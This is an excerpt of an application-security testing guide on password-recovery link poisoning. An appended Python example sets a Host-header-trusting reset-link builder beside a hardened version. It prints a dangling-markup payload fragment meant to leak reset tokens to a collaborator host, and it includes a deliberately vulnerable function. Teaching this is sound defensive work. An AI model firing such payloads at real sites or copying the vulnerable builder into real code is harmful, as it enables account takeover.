AppSec Tales III | Password Recovery

Karol Mazurek
7 min read · Apr 24, 2022

Application Security Testing of the Password Recovery form guidelines.

INTRODUCTION

The article describes the Application Security Testing of the Password Recovery forms to ensure a secure authentication process.
The advice in this article is based on:

  • OWASP Web Security Testing Guide
  • OWASP Application Security Verification Standard
  • NIST recommendations
  • bug bounty reports
  • my own experience.

I will provide a short test sample, a potential impact or an attack scenario, and a possible solution to the problem at each point.

GUIDELINES

I. PASSWORD RECOVERY LINK POISONING

Poison the domain part of the password recovery link.

  • It could allow an attacker to hijack the account of any victim user who clicks the poisoned password recovery link, because the link (and the reset token in it) points at a domain the attacker controls.

Source: Own study — The testing flow of password reset poisoning (fuzzing wordlist).

DANGLING MARKUPS PAYLOADS

"><img src='//domain_collab? 
"><img…
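Added example (not code from the article or from any project it references) covering both the link-poisoning point above and the dangling-markup payloads: a minimal Python model of reset-link generation with a vulnerable builder that copies the domain from the request's Host header beside a hardened one that uses only a configured canonical origin, a syntactic Host check that doubles as a detection signal, and an HTML-escaping email template so an injected value such as `"><img src='//…` cannot open a tag. The `Request` class, `CANONICAL_ORIGIN` and the `app.example.com` / `evil.example.net` hostnames are constructed for this example.

```python
import html
import re
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlencode, urlsplit

# Canonical origin the application is reachable at. Constructed for this
# example; in a real deployment it comes from configuration, never from
# anything the client sends.
CANONICAL_ORIGIN = "https://app.example.com"

# RFC 1123 hostname with an optional port: each label is 1-63 characters of
# letters, digits or hyphens and does not start or end with a hyphen.
_HOST_RE = re.compile(
    r"^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
    r"(?::\d{1,5})?$",
    re.IGNORECASE,
)


def is_well_formed_host(host: str) -> bool:
    """Syntactic check on a Host value: quotes, angle brackets, slashes or
    spaces never occur in a hostname, so such a value is worth alerting on."""
    return len(host) <= 253 and _HOST_RE.fullmatch(host) is not None


@dataclass
class Request:
    """Minimal stand-in for an incoming HTTP request (constructed)."""
    headers: dict = field(default_factory=dict)

    def header(self, name: str, default: str = "") -> str:
        return self.headers.get(name.lower(), default)


def build_reset_link_vulnerable(req: Request, token: str) -> str:
    """VULNERABLE: the domain is copied from the request's Host header, so
    whoever submits the reset request decides where the emailed link points.
    The same applies to any host value a reverse proxy forwards from the client."""
    return f"https://{req.header('host')}/reset?{urlencode({'token': token})}"


def build_reset_link(token: str, origin: str = CANONICAL_ORIGIN) -> str:
    """HARDENED: the domain comes only from configuration; the request is
    not consulted at all."""
    parts = urlsplit(origin)
    if parts.scheme != "https" or not parts.netloc or parts.path not in ("", "/"):
        raise ValueError("origin must be a bare https origin, e.g. https://host")
    return f"https://{parts.netloc}/reset?{urlencode({'token': token})}"


def host_matches_canonical(req: Request, origin: str = CANONICAL_ORIGIN) -> bool:
    """Defence in depth and a detection signal: legitimate traffic never arrives
    with any other Host value, so a mismatch should be refused and logged."""
    return req.header("host").lower() == urlsplit(origin).netloc.lower()


def render_reset_email(link: str, display_name: str) -> str:
    """Every value placed in the HTML email is escaped, so an injected
    "><img src='//... cannot open a dangling tag that would swallow the rest
    of the markup, reset token included, into an outbound request."""
    return (
        "<p>Hello {name},</p>"
        '<p><a href="{link}">Reset your password</a></p>'
    ).format(
        name=html.escape(display_name, quote=True),
        link=html.escape(link, quote=True),
    )


def handle_reset_request(req: Request, display_name: str) -> str:
    """Hardened request handler: validate Host, then build and render."""
    host = req.header("host")
    if not is_well_formed_host(host) or not host_matches_canonical(req):
        raise PermissionError(f"unexpected Host header rejected: {host!r}")
    token = secrets.token_urlsafe(32)  # single-use and short-lived in a real system
    return render_reset_email(build_reset_link(token), display_name)


if __name__ == "__main__":
    tampered = Request({"host": "evil.example.net"})  # constructed request
    print("vulnerable:", build_reset_link_vulnerable(tampered, "t0k3n"))
    print("hardened:  ", build_reset_link("t0k3n"))
    print(handle_reset_request(Request({"host": "app.example.com"}), "Alice"))
```

The two builders differ in exactly one decision: where the scheme and host of the link come from. Keeping that value in configuration removes the poisoning vector regardless of which header a fuzzing wordlist targets, and the `host_matches_canonical` refusal gives the SOC a log line to alert on while `is_well_formed_host` catches values that are not hostnames at all.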
